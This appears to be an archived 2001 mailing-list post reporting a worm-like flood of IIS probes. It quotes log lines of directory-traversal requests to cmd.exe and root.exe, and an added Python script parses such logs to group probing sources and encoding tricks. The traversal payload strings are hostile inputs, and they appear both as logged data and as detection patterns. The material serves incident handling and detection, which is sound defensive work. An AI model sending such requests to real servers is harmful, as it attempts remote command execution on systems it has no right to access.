Wow. This morning we've been hit with a deluge of attempts at ....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here>. My IDS is going haywire. They're coming from diverse IPs, mostly in the 216.* class A. This doesn't appear to be a standard Code Red type thing. Have a look at log excerpts... This all appeared to kick off at roughly 9AM EST. Have I missed some prolific worm out there?

2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

All of the offending IPs are following this exact pattern, indicating a worm.

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morganat_private
304-755-8291 x142

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
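The excerpt above is in the default IIS W3C extended log format, and the thing a defender wants from it is a quick per-source triage: which client IPs are requesting cmd.exe or root.exe, and which path-traversal encodings (plain `..%5c..`, `..%2f..`, the overlong-UTF-8 `..%c0%af..` family, and double-encoded `..%255c..`) each one used. The following is an added example, not code from the original post or from SecurityFocus; it assumes the field order visible in the excerpt (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status), the overlong separator list is an assumption, and the sample log is constructed from the post's lines plus a benign request and a second, hypothetical source IP.

```python
"""Triage IIS W3C extended log lines for cmd.exe/root.exe probing.

Added example, not code from the original post. Assumes the IIS W3C field
order shown in the excerpt: date time c-ip cs-username s-ip s-port
cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional, Tuple
from urllib.parse import unquote_to_bytes

# Percent-encoded byte pairs that old IIS builds treated as a path separator
# although they are not valid UTF-8 (the "..%c0%af.." family). Assumed list.
OVERLONG_SEPARATORS = ("%c0%af", "%c0%2f", "%c1%1c", "%c1%9c")
TARGET_BINARIES = {"cmd.exe", "root.exe"}


@dataclass
class Finding:
    client_ip: str
    stem: str
    techniques: Tuple[str, ...]


def decode_stem(stem: str) -> bytes:
    """Percent-decode twice so a double-encoded %255c becomes %5c and then a
    backslash, fold backslashes to '/', and lower-case for matching."""
    once = unquote_to_bytes(stem)          # str -> bytes, one decode pass
    twice = unquote_to_bytes(once)         # second pass for %25xx sequences
    return twice.replace(b"\\", b"/").lower()


def classify(stem: str, query: str) -> Tuple[str, ...]:
    """Return the probing techniques seen in one request, or () if none."""
    techniques = []
    normalized = decode_stem(stem)
    # Any path segment beginning with '..' counts as traversal; this also
    # catches mangled forms such as '..Á..' where the separator was lost.
    if any(seg.startswith(b"..") for seg in normalized.split(b"/")):
        techniques.append("traversal")
    if any(seq in stem.lower() for seq in OVERLONG_SEPARATORS):
        techniques.append("overlong-encoding")
    basename = normalized.rsplit(b"/", 1)[-1].decode("ascii", "replace")
    if basename in TARGET_BINARIES:
        techniques.append(basename)
    if query.lower().startswith("/c"):     # "/c+dir": shell switch in query
        techniques.append("cmd-switch")
    return tuple(techniques)


def parse_line(line: str) -> Optional[Finding]:
    """Parse one W3C log row; skip #-directives and short/blank rows."""
    fields = line.split()
    if len(fields) < 10 or fields[0].startswith("#"):
        return None
    client_ip, stem, query = fields[2], fields[7], fields[8]
    techniques = classify(stem, query)
    return Finding(client_ip, stem, techniques) if techniques else None


def triage(lines):
    """Group findings per client IP: {ip: {"hits": n, "techniques": set}}."""
    report = defaultdict(lambda: {"hits": 0, "techniques": set()})
    for line in lines:
        finding = parse_line(line)
        if finding:
            report[finding.client_ip]["hits"] += 1
            report[finding.client_ip]["techniques"].update(finding.techniques)
    return dict(report)


# Constructed sample: rows from the post (server IP replaced by 10.0.0.5),
# one benign request, and a hypothetical second source using %255c.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status
2001-09-18 13:38:01 216.230.91.177 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - 10.0.0.5 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - 10.0.0.5 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:39:02 192.0.2.44 - 10.0.0.5 80 GET /index.html - 200 -
2001-09-18 13:40:15 192.0.2.44 - 10.0.0.5 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404 -
"""

if __name__ == "__main__":
    for ip, summary in triage(SAMPLE_LOG.splitlines()).items():
        print(ip, summary["hits"], sorted(summary["techniques"]))
```

Feed it a real log with `triage(open(path, encoding="latin-1"))`; the 401/404 status is deliberately ignored, because a rejected probe is still the signal that a source is scanning you, and the per-IP technique set is what lets you tell one scanner's fixed sequence (as in the post) from a human trying variations.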
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:41:12 PDT